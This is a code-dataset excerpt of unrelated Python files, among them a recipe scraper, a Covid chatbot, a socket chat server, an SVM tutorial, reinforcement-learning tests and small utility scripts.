args[i],\n arg_copy,\n atol=0.5 * 10 ** (-DECIMAL_PLACES),\n err_msg=\"Input 'arg %s' mutated by %s\"\n % (i, func.__name__),\n )\n for kwarg_name, kwarg_copy in iteritems(kwarg_copies):\n assert_allclose(\n kwargs[kwarg_name],\n kwarg_copy,\n atol=0.5 * 10 ** (-DECIMAL_PLACES),\n err_msg=\"Input '%s' mutated by %s\"\n % (kwarg_name, func.__name__),\n )\n\n return result\n\n return check_not_mutated\n","sub_path":"quantbear/tests/test_derivatives.py","file_name":"test_derivatives.py","file_ext":"py","file_size_in_byte":5169,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"125620582","text":"#!/usr/bin/env cctbx.python\n\n# code to mend BKGINIT.py under special circumstances\n\nfrom __future__ import absolute_import, division, print_function\n\nimport binascii\nimport copy\nimport sys\n\nfrom cbflib_adaptbx import compress, uncompress\nfrom scitbx.array_family import flex\n\n\ndef recompute_BKGINIT(bkginit_in, init_lp, bkginit_out):\n\n start_tag = binascii.unhexlify(\"0c1a04d5\")\n\n data = open(bkginit_in, \"rb\").read()\n data_offset = data.find(start_tag) + 4\n cbf_header = data[: data_offset - 4]\n\n fast = 0\n slow = 0\n length = 0\n\n for record in cbf_header.split(\"\\n\"):\n if \"X-Binary-Size-Fastest-Dimension\" in record:\n fast = int(record.split()[-1])\n elif \"X-Binary-Size-Second-Dimension\" in record:\n slow = int(record.split()[-1])\n elif \"X-Binary-Number-of-Elements\" in record:\n length = int(record.split()[-1])\n\n assert length == fast * slow\n\n pixel_values = uncompress(packed=data[data_offset:], fast=fast, slow=slow)\n\n untrusted = []\n\n for record in open(init_lp):\n if \"UNTRUSTED_RECTANGLE=\" in record:\n untrusted.append(map(int, record.replace(\".\", \" \").split()[1:5]))\n\n modified_pixel_values = copy.deepcopy(pixel_values)\n\n for s in range(5, slow - 5):\n y = s + 1\n for f in range(5, fast - 5):\n x = f + 1\n trusted = True\n for x0, x1, y0, y1 in untrusted:\n if (x >= x0) and (x <= x1) and (y >= y0) and (y <= y1):\n trusted = False\n break\n\n if trusted:\n pixel = pixel_values[s * fast + f]\n if pixel < 0:\n pixels = []\n for j in range(-2, 3):\n for i in range(-2, 3):\n p = pixel_values[(s + j) * fast + f + i]\n if p > 0:\n pixels.append(p)\n modified_pixel_values[s * fast + f] = int(sum(pixels) / len(pixels))\n\n open(bkginit_out, \"wb\").write(\n cbf_header + start_tag + compress(modified_pixel_values)\n )\n\n return\n\n\nif __name__ == \"__main__\":\n\n recompute_BKGINIT(\"BKGINIT.cbf\", \"INIT.LP\", sys.argv[1])\n","sub_path":"modules/xia2/Toolkit/MendBKGINIT.py","file_name":"MendBKGINIT.py","file_ext":"py","file_size_in_byte":2239,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"605248941","text":"# Scraping file combs allrecipes.com for information on: recipe title, # people to make the \n# recipe, # of reviews, star rating, time to completion, ingredients, steps, and category. \n\nimport os, re, time, string\nimport numpy as np\nfrom selenium import webdriver\n\n_start_time = time.time()\n\ndef tic():\n global _start_time \n _start_time = time.time()\n\ndef toc():\n t_sec = round(time.time() - _start_time)\n (t_min, t_sec) = divmod(t_sec, 60)\n (t_hour,t_min) = divmod(t_min, 60) \n print('Time passed: {}hour:{}min:{}sec'.format(t_hour, t_min, t_sec))\n\ntic()\n\nchromedriver = '/usr/local/bin/chromedriver'\nos.environ['webdriver.chrome.driver'] = chromedriver\ndriver = webdriver.Chrome(chromedriver)\n\npages = ['https://www.allrecipes.com/recipes/233/world-cuisine/asian/indian/?page=' + str(p) for p in range(1,31)]\n\nfor j in pages:\n\n driver.get(str(j))\n\n fav = driver.find_elements_by_class_name('favorite')\n ids = []\n names = []\n urls = []\n for x in np.arange(len(fav)):\n ids.append(str(fav[x].get_attribute('data-id')))\n names.append(str(fav[x].get_attribute('data-name')))\n urls = ['https://allrecipes.com/recipe/' + id for id in ids] \n #print(urls)\n #print(len(urls))\n\n for i in urls: \n \n try:\n driver.get(str(i))\n\n recipetitle = driver.find_element_by_class_name('recipe-summary__h1').text\n\n madeitcount = driver.find_element_by_class_name('made-it-count').text\n\n reviewcount = driver.find_element_by_class_name('review-count').text\n reviewcount = str(re.findall('(\\w+) reviews', reviewcount)[0])\n\n starrating = driver.find_element_by_class_name('rating-stars').get_attribute('data-ratingstars')\n\n readyintime = driver.find_element_by_class_name('ready-in-time').text\n\n ingred = driver.find_elements_by_class_name('checkList__item')\n ingredients = []\n for x in np.arange(len(ingred)-1):\n ingredients.append(str(ingred[x].text))\n\n step = driver.find_elements_by_class_name('recipe-directions__list--item')\n steps = []\n for x in np.arange(len(step)-1):\n steps.append(str(step[x].text))\n\n cat = driver.find_elements_by_class_name('toggle-similar__title')\n categories = []\n for x in np.arange(len(cat)):\n categories.append(str(cat[x].text))\n \n print(recipetitle + ' | ' + madeitcount + ' | ' + reviewcount + ' | ' + starrating + ' | ' + readyintime + ' | ' + '; '.join(ingredients) + ' | ' + '; '.join(steps) + ' | ' + '; '.join(categories))\n\n except:\n continue\n\ndriver.quit()\n\ntoc()\n\n\n\n\n","sub_path":"scrape_allrecipes_indian.py","file_name":"scrape_allrecipes_indian.py","file_ext":"py","file_size_in_byte":2720,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"519391485","text":"from timer import *\nfrom timerclass import *\n\nmyTimer = timerclass(5)\nmyTimer.StartTimer()\nexit = 0\n\nwhile exit == 0:\n\tprint(\"0: Exit\")\n\tprint(\"1: Start timer\")\n\tprint(\"2: Stop timer\")\n\tprint(\"3: Stop alarm\")\n\tprint(\"4: Add timer (HHMM)\")\n\tprint(\"5: Check sound\")\n\n\taction = raw_input(\"Select action: \")\n\n\tif int(action) == 0:\n\t\tmyTimer.StopTimer()\n\t\texit = 1\n\telif int(action) == 1:\n\t\tmyTimer.StartTimer()\n\telif int(action) == 2:\n\t\tmyTimer.StopTimer()\n\telif int(action) == 3:\n\t\tmyTimer.StopAlarm()\n\telif int(action) == 4:\n\t\ttm = raw_input(\"Time HHMM \")\n\t\tmess = raw_input(\"Message \")\n\t\tmyTimer.AddTimer(int(tm), False, False, mess)\n\telif int(action) == 5:\n\t\tmyTimer.TestSound()\n","sub_path":"services/timer/testtimer.py","file_name":"testtimer.py","file_ext":"py","file_size_in_byte":679,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"481224448","text":"#!/usr/bin/env python\n\n# # Leaflet cluster map of talk locations\n#\n# (c) 2016-2017 R. Stuart Geiger, released under the MIT license\n#\n# Run this from the _talks/ directory, which contains .md files of all your talks. \n# This scrapes the location YAML field from each .md file, geolocates it with\n# geopy/Nominatim, and uses the getorg library to output data, HTML,\n# and Javascript for a standalone cluster map.\n#\n# Requires: glob, getorg, geopy\n\nimport glob\nimport getorg\nfrom geopy import Nominatim\n\ng = glob.glob(\"*.md\")\n\n\ngeocoder = Nominatim(user_agent = 'talkmap-moshe')\nlocation_dict = {}\nlocation = \"\"\npermalink = \"\"\ntitle = \"\"\n\n\nfor file in g:\n with open(file, 'r') as f:\n lines = f.read()\n def get_field(field):\n n = lines.find(field + ': \"')\n if n < 2:\n return ''\n loc_start = n + len(field) + 3\n lines_trim = lines[loc_start:]\n loc_end = lines_trim.find('\"')\n return lines_trim[:loc_end]\n\n\n location = get_field('location')\n title = get_field('title')\n date = get_field('date')\n\n slug = file.rsplit('.', 1)[0]\n\n key = ';;'.join([slug, title, date, location])\n\n location_dict[key] = geocoder.geocode(location)\n print(key, \"\\n\", location_dict[key])\n\n\nm = getorg.orgmap.create_map_obj()\ngetorg.orgmap.output_html_cluster_map(location_dict, folder_name=\"../talkmap\", hashed_usernames=False)\n\n\n\n\n","sub_path":"talkmap.py","file_name":"talkmap.py","file_ext":"py","file_size_in_byte":1450,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"37074279","text":"import warnings\n\nwith warnings.catch_warnings():\n warnings.filterwarnings(\"ignore\", category=FutureWarning)\n from tensorflow.keras.models import load_model\nimport nltk\nimport tensorflow as tf\nfrom snowballstemmer import TurkishStemmer\nimport numpy as np\nimport random\nimport json\n#import requests\n#import bs4\n\n#nltk.download('punkt')\n\n# Json dosyası olarak oluşturulan Covid-19 metin veri setini yükleme\nwith open(r\"covidDataset.json\", encoding=\"utf8\") as file:\n data = json.load(file)\n\n# Değişken tanımlamaları\nstemmer = TurkishStemmer()\nwords = []\nlabels = []\ndocs_x = []\ndocs_y = []\ntag = \" \"\nglobal cevap\n# Cümlelerin kelimelere ve etiketlere ayrılması\nfor intent in data[\"intents\"]:\n for pattern in intent[\"patterns\"]:\n wrds = nltk.word_tokenize(pattern)\n words.extend(wrds)\n docs_x.append(wrds)\n docs_y.append(intent[\"tag\"])\n\n if intent[\"tag\"] not in labels:\n labels.append(intent[\"tag\"])\n\n# Cümlelerin küçük harfe alınması ve ayrılması\nwords = [stemmer.stemWord(w.lower()) for w in words if w != \"?\"]\nwords = sorted(list(set(words)))\n\n# Etiketlerin alfabetik sıralanması\nlabels = sorted(labels)\n\n# Eğitilmiş ağırlık dosyasının yüklenmesi.\n# Eğitilmiş ağırlık dosyasının yüklenmesi.\n\nmodel = load_model('covid.h5')\n\n\n# Buradaki fonksiyon bot ile konuşan kişinin cümlelerini 1 ve 0'lar ile ifade etmesine yarıyor.\ndef bag_of_words(s, words):\n bag = [0 for _ in range(len(words))]\n s_words = nltk.word_tokenize(s)\n s_words = [stemmer.stemWord(word.lower()) for word in s_words]\n for se in s_words:\n for i, w in enumerate(words):\n if w == se:\n bag[i] = 1\n #print(np.array(bag))\n return np.array(bag)\n\n\n# Sohbet fonksiyonu\ndef chat(message):\n\n results = model.predict(np.asanyarray([bag_of_words(message, words)]))[0]\n # print(results)\n results_index = np.argmax(results)\n # print(\"label sayısı\",len(labels))\n tag = labels[results_index]\n # print(\"etiket\",tag)\n # print(\"tahmin\",results[results_index] )\n if results[results_index] > 0.85:\n for tg in data[\"intents\"]:\n if tg['tag'] == tag:\n responses = tg['responses']\n return [random.choice(responses), tag]\n else:\n return [\"Tam olarak anlayamadım\", \"bulanamadı\"]\n\n\ndef cevapla(mesaj):\n cevap = chat(mesaj)\n print(\"*****************\", cevap)\n return cevap\n","sub_path":"chatMain.py","file_name":"chatMain.py","file_ext":"py","file_size_in_byte":2436,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"615770441","text":"# -*- coding: utf-8 -*-\n\"\"\"\n Main page views.\n\"\"\"\n\n__author__ = \"Mikko Ohtamaa \"\n__copyright__ = \"mFabrik Research Oy\"\n__license__ = \"BSD\"\n__docformat__ = \"epytext\"\n\n# Python standard library imports\nimport os\nimport logging\n\n# Appengine imports\nfrom google.appengine.ext.webapp import template\nfrom google.appengine.ext import webapp\nfrom google.appengine.ext.webapp.util import run_wsgi_app\n\n\nclass PigPage(webapp.RequestHandler):\n \"\"\"Base class for page renderer\"\"\"\n\n def render_page(self, template_file_name):\n \"\"\" Render a page template from templates folder\"\"\"\n\n # Fill in template parameters\n vars = {}\n\n path = os.path.join(os.path.dirname(__file__), 'templates', template_file_name)\n self.response.out.write(template.render(path, vars))\n\n\nclass MainPage(PigPage):\n \"\"\"Index page of the site\"\"\"\n\n def get(self):\n self.render_page(\"main.html\")\n\n\nclass AboutPage(PigPage):\n def get(self):\n self.render_page(\"about.html\")\n\n\nclass InEnglishPage(PigPage):\n def get(self):\n self.render_page(\"english.html\")\n\n\nclass CompaniesPage(PigPage):\n def get(self):\n self.render_page(\"companies.html\")\n\n\nclass BlogsPage(PigPage):\n def get(self):\n self.render_page(\"blogs.html\")\n\n\nclass JobsPage(PigPage):\n def get(self):\n self.render_page(\"jobs.html\")\n\n\nclass LearnPage(PigPage):\n def get(self):\n self.render_page(\"learn.html\")\n\n\nclass NotFound(PigPage):\n \"\"\"Handle URIs not found\"\"\"\n def get(self):\n self.render_page(\"404.html\")\n\n\napplication = webapp.WSGIApplication([\n ('/about', AboutPage),\n ('/english', InEnglishPage),\n ('/companies', CompaniesPage),\n ('/blogs', BlogsPage),\n ('/jobs', JobsPage),\n ('/learn', LearnPage),\n ('/', MainPage),\n ('/.*', NotFound),\n], debug=True)\n\n\ndef main():\n logging.getLogger().setLevel(logging.DEBUG)\n run_wsgi_app(application)\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1976,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"592533313","text":"from intcode import Program\nimport random\n\n\ndef limits(state):\n xMin, xMax, yMin, yMax = 0, 0, 0, 0\n for x, y in state:\n xMin = min(xMin, x)\n xMax = max(xMax, x)\n yMin = min(yMin, y)\n yMax = max(yMax, y)\n return xMin, xMax, yMin, yMax\n\n\ndef display(state, dead, pos):\n xMin, xMax, yMin, yMax = limits(state)\n output = []\n for j in range(yMax + 1 - yMin):\n y = yMin + j\n row = []\n for i in range(xMax + 1 - xMin):\n x = xMin + i\n p = (x, y)\n if x == pos[0] and y == pos[1]:\n row.append('@')\n elif x == 0 and y == 0:\n row.append('x')\n elif p not in state:\n row.append(' ')\n elif state[p] == 0:\n row.append('#')\n elif state[p] == 1:\n if p in dead:\n row.append('-')\n else:\n row.append('.')\n elif state[p] == 2:\n row.append('o')\n else:\n raise Exception(\"This shouldn't happend right\")\n output.append(''.join(row))\n output.append('\\n')\n return '\\n'.join(output)\n\n\ndef update_position(pos, direction):\n x, y = pos\n if direction == 1:\n return (x, y - 1)\n elif direction == 2:\n return (x, y + 1)\n elif direction == 3:\n return (x - 1, y)\n elif direction == 4:\n return (x + 1, y)\n else:\n raise Exception('Unknown direction')\n\n\ndef dead_options(pos, dead):\n count = 0\n for d in range(1, 5):\n opt_pos = update_position(pos, d)\n if opt_pos not in dead:\n count += 1\n return count < 2\n\n\ndef pick_direction(pos, prev, state, dead):\n options = []\n for d in range(1, 5):\n opt_pos = update_position(pos, d)\n if opt_pos not in state:\n return d\n if opt_pos not in dead:\n options.append(d)\n back_direction = -1\n if prev == 1:\n back_direction = 2\n elif prev == 2:\n back_direction = 1\n elif prev == 3:\n back_direction = 4\n elif prev == 4:\n back_direction = 3\n if len(options) == 0:\n return None\n elif len(options) > 1 and back_direction in options:\n options.remove(back_direction)\n return random.choice(options)\n\n\ndef solve(memory):\n program = Program(memory, [])\n state = {}\n pos = (0, 0)\n direction = 2\n oxygen_pos = None\n steps = 0\n distances = {pos: steps}\n dead = set()\n while not program.halted:\n new_pos = update_position(pos, direction)\n program.append(direction)\n program.run()\n if program.awaiting_input:\n status = program.pop()\n if status == 0:\n state[new_pos] = 0\n # don't update pos\n dead.add(new_pos)\n elif status == 1 or status == 2:\n state[new_pos] = 1\n pos = new_pos\n if dead_options(pos, dead):\n dead.add(pos)\n steps += 1\n if pos in distances:\n if distances[pos] < steps:\n steps = distances[pos]\n else:\n distances[pos] = steps\n else:\n distances[pos] = steps\n if status == 2:\n oxygen_pos = pos\n else:\n raise Exception('Bad status')\n direction = pick_direction(pos, direction, state, dead)\n if direction is None:\n break\n if oxygen_pos is not None:\n print(distances[oxygen_pos])\n print(display(state, dead, pos))\n return distances[oxygen_pos]\n\n\ndef read(filename):\n memory = {}\n with open(filename, 'r') as f:\n for k, n in enumerate(f.readline().split(',')):\n memory[k] = int(n)\n return memory\n\n\ndef main(filename):\n print(solve(read(filename)))\n\n\nif __name__ == \"__main__\":\n import sys\n if (len(sys.argv) < 2):\n print('missing input parameter')\n exit()\n for f in sys.argv[1:]:\n main(f)\n","sub_path":"15/first.py","file_name":"first.py","file_ext":"py","file_size_in_byte":4153,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"253648703","text":"from sklearn import svm\n\n#an array X of size [n_samples, n_features]\n#holding the training samples\nX = [[0, 0], [1, 1]]\n\n#an array y of class labels (strings or integers), size [n_samples]\ny = [0, 1]\n\n\nclf = svm.SVC()\nclf.fit(X, y)\n\n#the model can then be used to predict new values\nprint(clf.predict([[2., 2.]]))#ans:- [1]\n\nprint(clf.predict([[.3, .3]]))#ans:- [0]\n\n# get support vectors\nprint(clf.support_vectors_)\n# array([[ 0., 0.],\n# [ 1., 1.]])\n# get indices of support vectors\nprint(clf.support_) \n#array([0, 1]...)\n# get number of support vectors for each class\nprint(clf.n_support_) \n#array([1, 1]...)\n\n#parameters of svm\n# sklearn.svm.SVC(\n# C=1.0, kernel='rbf', degree=3, \n# gamma=0.0, coef0=0.0, shrinking=True, \n# probability=False,tol=0.001, cache_size=200, \n# class_weight=None, verbose=False, max_iter=-1, \n# random_state=None)\n\n# kernel --> options are “linear”, “rbf”,”poly” \n# and others (default value is “rbf”). Here “rbf” \n# and “poly” are useful for non-linear hyper-plane.\n\n#-----------------------------------------------------------------------#\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom matplotlib import style\nstyle.use(\"ggplot\")\nfrom sklearn import svm\n\n#let's consider that we have two features to consider. \n#These features will be visualized as axis on our graph\n\nx = [1, 5, 1.5, 8, 1, 9]\ny = [2, 8, 1.8, 8, 0.6, 11]\n\nplt.scatter(x,y)\nplt.show()\n\n#feature list\nX = np.array([[1,2],\n [5,8],\n [1.5,1.8],\n [8,8],\n [1,0.6],\n [9,11]])\n\n#Now as this is supervised learning we have label for each data\n#we have two labels 0 and 1 \n#For our labels, \"targets,\" will be \nY = [0,1,0,1,0,1]\n#so point_1 is in 0 label, then point_2 is in 1 label, point_3 is in 0 label \n#and so on and so forth\n#our classifier is \nclf = svm.SVC(kernel='linear', C = 1.0)\nclf.fit(X,Y)\n\n#we can predict and test. Let's print a prediction\nprint(clf.predict([0.58,0.76]))#label 0\nprint(clf.predict([10.58,10.76]))#label 1\n\n\n","sub_path":"pymining/jay/svm.py","file_name":"svm.py","file_ext":"py","file_size_in_byte":2110,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"37334515","text":"import socketserver\nimport threading\n \nADDRESS = ('127.0.0.1', 8712) # 绑定地址\n \ng_conn_pool = [] # 连接池\n \nclass ThreadedTCPRequestHandler(socketserver.BaseRequestHandler):\n \n def setup(self):\n self.request.sendall(\"连接服务器成功!\".encode(encoding='utf8'))\n # 加入连接池\n g_conn_pool.append(self.request)\n \n def handle(self):\n while True:\n try:\n bytes = self.request.recv(1024)\n print(\"客户端消息:\", bytes.decode(encoding=\"utf8\"))\n except: # 意外掉线\n self.remove()\n break\n \n def finish(self):\n print(\"清除了这个客户端。\")\n \n def remove(self):\n print(\"有一个客户端掉线了。\")\n g_conn_pool.remove(self.request)\n \n \nclass ThreadedTCPServer(socketserver.ThreadingMixIn, socketserver.TCPServer):\n pass\n \n \nif __name__ == '__main__':\n server = ThreadedTCPServer(ADDRESS, ThreadedTCPRequestHandler)\n # 新开一个线程运行服务端\n server_thread = threading.Thread(target=server.serve_forever)\n server_thread.daemon = True\n server_thread.start()\n \n # 主线程逻辑\n while True:\n cmd = input(\"\"\"--------------------------\n输入1:查看当前在线人数\n输入2:给指定客户端发送消息\n输入3:关闭服务端\n\"\"\")\n if cmd == '1':\n print(\"--------------------------\")\n print(\"当前在线人数:\", len(g_conn_pool))\n elif cmd == '2':\n print(\"--------------------------\")\n index, msg = input(\"请输入“索引,消息”的形式:\").split(\",\")\n g_conn_pool[int(index)].sendall(msg.encode(encoding='utf8'))\n elif cmd == '3':\n server.shutdown()\n server.server_close()\n exit()","sub_path":"Python/socket处理多客户端连接/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":1823,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"407047786","text":"# Copyright 2017 reinforce.io. All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n# ==============================================================================\n\nfrom __future__ import absolute_import\nfrom __future__ import print_function\nfrom __future__ import division\n\nimport unittest\n\nfrom tensorforce import Configuration\nfrom tensorforce.agents import RandomAgent\nfrom tensorforce.environments.minimal_test import MinimalTest\nfrom tensorforce.execution import Runner\nfrom tensorforce.tests import reward_threshold\n\n\nclass TestRandomAgent(unittest.TestCase):\n\n def test_discrete(self):\n environment = MinimalTest(definition=False)\n config = Configuration(\n states=environment.states,\n actions=environment.actions\n )\n agent = RandomAgent(config=config)\n runner = Runner(agent=agent, environment=environment)\n\n def episode_finished(r):\n return r.episode < 100 or not all(x / l >= 0.9 for x, l in zip(r.episode_rewards[-100:], r.episode_lengths[-100:]))\n\n runner.run(episodes=1000, episode_finished=episode_finished)\n print('Random agent (discrete): ' + str(runner.episode))\n self.assertTrue(runner.episode == 1000)\n\n def test_continuous(self):\n environment = MinimalTest(definition=True)\n config = Configuration(\n states=environment.states,\n actions=environment.actions\n )\n agent = RandomAgent(config=config)\n runner = Runner(agent=agent, environment=environment)\n\n def episode_finished(r):\n return r.episode < 100 or not all(x / l >= reward_threshold for x, l in zip(r.episode_rewards[-100:],\n r.episode_lengths[-100:]))\n\n runner.run(episodes=1000, episode_finished=episode_finished)\n print('Random agent (continuous): ' + str(runner.episode))\n self.assertTrue(runner.episode == 1000)\n\n def test_multi(self):\n environment = MinimalTest(definition=[False, (False, 2), (False, (1, 2)), (True, (1, 2))])\n config = Configuration(\n states=environment.states,\n actions=environment.actions\n )\n agent = RandomAgent(config=config)\n runner = Runner(agent=agent, environment=environment)\n\n def episode_finished(r):\n return r.episode < 20 or not all(x / l >= reward_threshold for x, l in zip(r.episode_rewards[-20:],\n r.episode_lengths[-20:]))\n\n runner.run(episodes=1000, episode_finished=episode_finished)\n print('Random agent (multi-state/action): ' + str(runner.episode))\n self.assertTrue(runner.episode == 1000)\n","sub_path":"tensorforce/tests/test_random_agent.py","file_name":"test_random_agent.py","file_ext":"py","file_size_in_byte":3296,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"77580046","text":"import numpy as np\nfrom pymongo import MongoClient\nimport os\n\n#function for inserting accession information into database\ndef insert_accession_info(file):\n #open file\n accession_file=\"./accession/\"+file\n sup_temp=np.loadtxt(open(accession_file,'r'),delimiter=\"\\n\",dtype=np.str)\n #connect to database\n client=MongoClient()\n db=client.emdb\n accession_collection=db.data_experiment_info\n accession_info={\"Accession_number\":sup_temp[0],\n \"Created_time\":sup_temp[1],\n \"Updated_time\":sup_temp[2],\n \"Method_category\":sup_temp[3],\n \"Method_detail\":sup_temp[4],\n \"Raw_data\":sup_temp[5],\n \"Species\":sup_temp[6],\n \"Reference_genome_version\":sup_temp[7],\n \"Cutoff\":sup_temp[8],\n \"Literature\":sup_temp[9],\n \"Doi\":sup_temp[10]\n }\n accession_collection.insert_one(accession_info)\n print(\"Finish %s\" % file)\n\nfor file_name in os.listdir(\"./accession\"):\n insert_accession_info(file_name)\nprint(\"Finish All.\")","sub_path":"Data_integration/accession2db.py","file_name":"accession2db.py","file_ext":"py","file_size_in_byte":1089,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"495487460","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Apr 3 15:03:57 2021\n\n@author: victorhuynh\n\"\"\"\n\nimport numpy as np\nimport pandas as pd\nfrom statsmodels.tsa.statespace.sarimax import SARIMAX\n\n\n\ndef ordre_SARIMA(histoMod, dateDebMod, dateFinMod):\n \n histoMod = histoMod.reset_index(drop = True)\n coupe = np.where(histoMod['Date'] == dateFinMod)[0][0]\n train = histoMod[histoMod.index <= coupe]\n \n stepwise_fit = auto_arima(train['PAX'], start_p=0, start_q=0,\n max_p=3, max_q=3, m=12,\n start_P=0, seasonal=True,\n d=None, D=1, trace=True,\n error_action='ignore', \n suppress_warnings=True, \n stepwise=True,\n information_criterion = 'bic')\n\n return stepwise_fit.order, stepwise_fit.seasonal_order\n\n\n\n### Validité des modèles\n\nimport statsmodels.api as sm\n\ndatabase = pd.read_csv(\"/Users/victorhuynh/Documents/ENSAE/ENSAE 2A/2A S2/Stat App/StatApp_2020/Data/database_sieges.csv\",low_memory=False,decimal=',')\ndatabase = database.astype({'Date': 'datetime64[ns]','PAX_FQM':'float','Sièges Corrections_ICI':'float','Coeff_Rempl':'float','Coeff_Rempl_FQM':'float'})\ndatabase = database.groupby(['Date','Faisceau','ArrDep']).agg({'PAX':'sum','PAX_FQM':'sum','Sièges Corrections_ICI':'sum','Coeff_Rempl':'mean','Coeff_Rempl_FQM':'mean'}).reset_index()\n\ndateDebMod = pd.to_datetime(\"2007-01-01\")\ndateFinMod = pd.to_datetime(\"2016-01-15\")\n\nhistoMod = database[(database['Date']>=dateDebMod) & (database['Date']<=dateFinMod)]\nhistoMod = histoMod[(histoMod['Faisceau']=='Autre UE') & (histoMod['ArrDep']=='Départ')]\n#A ré-adapter selon le faisceau et le type de mouvement qu'on étudie\n\nhistoMod = histoMod.reset_index(drop = True)\ncoupe = np.where(histoMod['Date'] == dateFinMod)[0][0]\ntrain = histoMod[histoMod.index <= coupe]\n \nordres, ordres_sais = ordre_SARIMA(histoMod, dateDebMod, dateFinMod)\nres = SARIMAX(train['PAX'], order = ordres, seasonal_order = ordres_sais).fit(disp = 0)\n\nsm.stats.acorr_ljungbox(res.resid, lags=12, return_df=True) #Test de Ljung-Box pour l'autocorrélation des résidus\nres.summary() #Pour voir la significativité des coefficients\n\nres = SARIMAX(train['PAX'], order = (0,0,2), seasonal_order = (1, 1, 1, 12)).fit(disp = 0)\nsm.stats.acorr_ljungbox(res.resid, lags=2*12, return_df=True, model_df=2) \n\nfrom scipy import stats\nlj = sm.stats.acorr_ljungbox(res.resid, lags = 10)\ncorrected_pval = stats.chi2.sf(lj[-1], 24 - 2)\nprint(corrected_pval)\n\n\n","sub_path":"Modélisation/Ordre optimal SARIMA et validite.py","file_name":"Ordre optimal SARIMA et validite.py","file_ext":"py","file_size_in_byte":2583,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"481132369","text":"import RPi.GPIO as GPIO\nimport time\n\nsw_in = 23\n\nGPIO.setmode(GPIO.BCM)\nGPIO.setup(sw_in, GPIO.IN, pull_up_down=GPIO.PUD_DOWN)\nGPIO.add_event_detect(sw_in, GPIO.FALLING)\n\nwhile True:\n if GPIO.event_detected(sw_in):\n print(\"Hit\")\n else:\n print(\".\", end=\"\", flush=True)\n time.sleep(.1)","sub_path":"asteria-v3/tests/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":294,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"565235467","text":"class Hand(object):\n\n def __init__(self, cards):\n self.cards = cards\n self.value = 0 # If multiple values are possible (i.e. hand contains an ace), value is the lower of the two\n\n def add(self, card):\n self.cards.append(card)\n\n def eval_hand(self):\n aces_count = 0\n self.value = 0\n for card in self.cards:\n self.value += card.val()\n if card.rank == \"Ace\":\n aces_count += 1\n\n if aces_count == 0: # No aces - return normal value\n return [self.value]\n elif (aces_count == 1 and self.value > 21) or aces_count == 2: # One ace with bust or two aces: count ace as 1\n self.value -= 10\n return [self.value]\n else: # One ace and no bust\n self.value -= 10\n return [self.value + 10, self.value]","sub_path":"Hand.py","file_name":"Hand.py","file_ext":"py","file_size_in_byte":851,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"16671943","text":"import os\nimport shutil\n\nfrom . import cfg\nimport logging as log\n\nverbose=False\n\ndef app_add(resource,appkernel,verbose=False):\n globals()['verbose']=verbose\n \n log.info(\"Generating application kernel configuration for %s on %s\",appkernel,resource)\n \n try:\n cfg.FindResourceByName(resource)\n except Exception:\n log.error(\"Can not find resource: %s\",resource)\n exit(1)\n try:\n cfg.FindAppByName(appkernel)\n except Exception:\n log.error(\"Can not find application kernel: %s\",appkernel)\n exit(1)\n \n cfgFilename=os.path.join(cfg.cfg_dir, 'resources', resource, appkernel + \".app.conf\")\n cfgTemplateFilename=os.path.join(cfg.templates_dir, appkernel + \".app.conf\")\n \n if os.path.isfile(cfgFilename):\n log.error(\"Configuration file for %s on %s already exist. For regeneration delete it\",appkernel,resource)\n log.info(\"Application kernel configuration for %s on %s is in: \\n\\t%s\",appkernel,resource,cfgFilename)\n exit(1)\n \n if not os.path.isfile(cfgTemplateFilename):\n log.error(\"Can not find template file for application kernel: %s\",cfgTemplateFilename)\n exit(1)\n \n shutil.copyfile(cfgTemplateFilename,cfgFilename)\n if os.path.isfile(cfgFilename):\n log.info(\"Application kernel configuration for %s on %s is in: \\n\\t%s\",appkernel,resource,cfgFilename)\n\n\n\nif __name__ == '__main__':\n import argparse\n # TIME: to get to parsing\n parser = argparse.ArgumentParser('Initial configuration generation for application kernel on resource')\n # SETUP: the arguments that we're going to support\n parser.add_argument('-v', '--verbose', action='store_true', help=\"turn on verbose logging\")\n parser.add_argument('resource', help=\"name of resource\")\n parser.add_argument('appkernel', help=\"name of application kernel\")\n # PARSE: them arguments\n args = parser.parse_args()\n \n 